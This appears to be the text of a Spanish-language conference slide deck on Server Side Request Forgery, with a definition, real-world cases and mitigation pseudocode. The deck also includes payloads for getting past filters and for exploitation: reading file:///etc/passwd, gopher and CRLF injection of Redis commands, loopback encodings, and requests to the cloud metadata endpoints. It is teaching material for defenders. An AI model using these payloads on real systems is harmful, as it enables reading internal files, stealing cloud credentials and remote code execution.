SSRF, la vulnerabilidad de las aplicaciones web modernas
Descargar como PPTX, PDF1 recomendación971 vistas
Este documento describe la vulnerabilidad de Server Side Request Forgery (SSRF) en aplicaciones web modernas. SSRF ocurre cuando una aplicación web realiza solicitudes a URLs proporcionadas por el usuario sin validarlas adecuadamente, lo que puede permitir el acceso no autorizado a recursos internos o externos. El documento también proporciona ejemplos de casos reales de SSRF y sugiere formas de mitigarla, como validar que las IPs de las solicitudes sean externas.
![http://app.myapp.com/fetch?url=http://www.example.com/resource
¿Qué es Server Side Request Forgery?
Frontend return curl(get[“url”])
Recurso
externo](https://image.slidesharecdn.com/ssrf-180614122538/85/SSRF-la-vulnerabilidad-de-las-aplicaciones-web-modernas-4-320.jpg)
![Caso SSRF
url = params[url];
if ( is_valid_uri(url) ) {
content = curl(url); // Do a curl request
return url;
}
http://app.myapp.com/fetch?url=http://www.example.com/resource
http://app.myapp.com/fetch?url=http://localhost:8080/jmx-console](https://image.slidesharecdn.com/ssrf-180614122538/85/SSRF-la-vulnerabilidad-de-las-aplicaciones-web-modernas-10-320.jpg)
![Sobrepasando filtros contra SSRF
http://127.0.0.1/
Formas válidas de referenciar “loopback”.
http://localhost/
http://[::]/
http://0000::1/
http://2130706433/
http://0177.0.0.1/
http://0.0.0.0/
http://0/
http://127.0.0.1.nip.io/](https://image.slidesharecdn.com/ssrf-180614122538/85/SSRF-la-vulnerabilidad-de-las-aplicaciones-web-modernas-11-320.jpg)
![Solución contra SSRF
url = params[url];
if ( is_public(ip2dec(gethostbyname(url)))){
<code>
}
Resolver la IP y comprobar que sea externa, si en nuestra aplicación usamos curl también
tener cuidado con los redirects.
pseudocódigo](https://image.slidesharecdn.com/ssrf-180614122538/85/SSRF-la-vulnerabilidad-de-las-aplicaciones-web-modernas-14-320.jpg)
SSRF, la vulnerabilidad de las aplicaciones web modernas
- 1. SSRF, la vulnerabilidad de las aplicaciones web modernas. Efrén Díaz & Gonzalo García.
- 2. Confidencial Personalizado para Nombre de la empresa Versión 1.0 $ whoami Efrén Díaz Gonzalo García Analistas de seguridad web y de sistemas en Open Data Security
- 3. Aplicaciones web modernas. Frontend Redis Elasticsearch Backend AWS/Google Cloud/Azure Memcached BBDD Graphite
- 4. http://app.myapp.com/fetch?url=http://www.example.com/resource ¿Qué es Server Side Request Forgery? Frontend return curl(get[“url”]) Recurso externo
- 5. http://app.myapp.com/fetch?url=http://127.0.0.1:9200 ¿Qué es Server Side Request Forgery? IP Interna Frontend Elasticsearch Backend :9200
- 6. ¿Qué es Server Side Request Forgery? SSRF
- 7. ¿Por qué Server Side Request Forgery? RCE en Github Enterprise (2 SSRF + CRLF Injection + Ruby Object Unmarshall) de “Orange Tsai” (12.500$) http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html HashiCorp Consul RCE vía SSRF de Peter Adkins http://www.kernelpicnic.net/2017/05/29/Pivoting-from- blind-SSRF-to-RCE-with-Hashicorp-Consul.html Shopify RCE vía SSRF de André Baptista (25.000$) https://hackerone.com/reports/341876 Google conexión a servicios internos vía SSRF https://www.rcesecurity.com/2017/03/ok- google-give-me-all-your-internal-dns-information/
- 8. http://app.myapp.com/fetch?url=file:///etc/passwd ¿Qué es Server Side Request Forgery? http://app.myapp.com/fetch?url=gopher://127.0.0.1:6379 http://app.myapp.com/fetch?url=http://169.254.169.254 Protocol smuggling
- 9. Caso SSRF ¿Qué solución propondrían al siguiente pseudocódigo vulnerable?
- 10. Caso SSRF url = params[url]; if ( is_valid_uri(url) ) { content = curl(url); // Do a curl request return url; } http://app.myapp.com/fetch?url=http://www.example.com/resource http://app.myapp.com/fetch?url=http://localhost:8080/jmx-console
- 11. Sobrepasando filtros contra SSRF http://127.0.0.1/ Formas válidas de referenciar “loopback”. http://localhost/ http://[::]/ http://0000::1/ http://2130706433/ http://0177.0.0.1/ http://0.0.0.0/ http://0/ http://127.0.0.1.nip.io/
- 12. Sobrepasando filtros contra SSRF RFC 3986 - El cacao de las URL http://www.google.com#@localhost:8888/ import urllib, urllib2 from urlparse import urlparse url = "http://www.google.com#@localhost:8888/" parsed = urlparse(url).netloc print "Host: " + parsed urllib.urlopen(url) www.google.com localhost:8888 Python 2.7.15
- 14. Solución contra SSRF url = params[url]; if ( is_public(ip2dec(gethostbyname(url)))){ <code> } Resolver la IP y comprobar que sea externa, si en nuestra aplicación usamos curl también tener cuidado con los redirects. pseudocódigo
- 15. Vamos con lo divertido, a explotar!
- 16. Explotando SSRF http:// https:// gopher:// file:// dict:// scp:// ftp:// tftp:// ldap:// Distintas librerías y distintos lenguajes soportan distintos protocolos, los más comunes son:
- 17. Explotando SSRF /etc/mysql/my.cnf /etc/apache2/apache2.conf /etc/nginx/nginx.conf /etc/redis/redis.conf /usr/local/etc/mongod.conf /etc/elasticsearch/elasticsearch.yml etc, etc, etc... Con el wrapper file:// podremos leer ficheros de la máquina siempre que conozcamos la ruta absoluta, lo que se conoce como un Local File Disclosure de toda la vida :D Tratándose de un servidor web algunos ficheros interesantes serían:
- 18. Explotando SSRF http://localhost:28017/api/:collection http://localhost:9200/_cat/indices?v El wrapper http:// nos servirá cuando queramos atacar a servicios que corran bajo protocolo http como por ejemplo Elasticsearch, MongoDB (no por defecto), etc... Listar una conexión de MongoDB mediante REST API: Obtener índices de Elasticsearch:
- 19. (SSRF + Amazon | Google Cloud | Azure) == PWND!
- 20. SSRF en Amazon Web Services / Google Cloud / Azure AWS: http://169.254.169.254/latest/meta-data/ GCloud: http://metadata.google.internal/computeMetadata/v1/ Azure: http://169.254.169.254/metadata/instance/ Metadatos de la instancia son accedidos vía HTTP Rest API
- 21. Cuando solo podemos utilizar HTTP… Petición HTTP Redis interpreta cada línea de la petición como un comando.
- 22. Inyección de cabeceras. Python 2.7.15 import urllib, urllib2 urllib.urlopen('http://127.0.0.1rnx20setx20keyx20valuern :8888') Cabecera redis inyectada
- 23. Inyección de cabeceras. NodeJS 8.11.1 (LTS) const http = require('http'); http.get("http://127.0.0.1:8888/ rnset key valuern") Saltos de línea y espacios son encodeados en “URL Encode”
- 24. Inyección de cabeceras. NodeJS 8.11.1 (LTS) const http = require('http'); http.get("http://127.0.0.1:8888/ -*set@key@value-*") Cabecera redis inyectada - U+FF0D * U+FF0A @ U+FF20 r 0D n 0A esp 20
- 25. VAMOS A LA DEMO!
- 26. SSRF A RCE CON REDIS Cockpit CMS /package.json 0.5.5 exploit-db ¡SSRF! SSRF Scan ¡Redis! Full Path Disclosure PWND!
Notas del editor
- #4: Efrén: componentes nuevos apps modernas
- #5: Efrén
- #6: Efrén por que hoy tiene tanta importancia
- #7: Efrén
- #8: Gonzalo
- #9: Gonzalo
- #10: Gonzalo
- #11: Gonzalo
- #12: Gonzalo
- #13: Gonzalo
- #15: Efrén file dissclosure php
- #16: Efrén
- #17: Efrén readfile file_get_contents curl
- #18: Efrén
- #19: Efrén LFD php PDF
- #20: Gonzalo
- #21: Gonzalo
- #22: Gonzalo
- #23: Gonzalo
- #24: Gonzalo
- #25: Gonzalo
- #26: Efrén/Gonzalo
- #27: Efrén/Gonzalo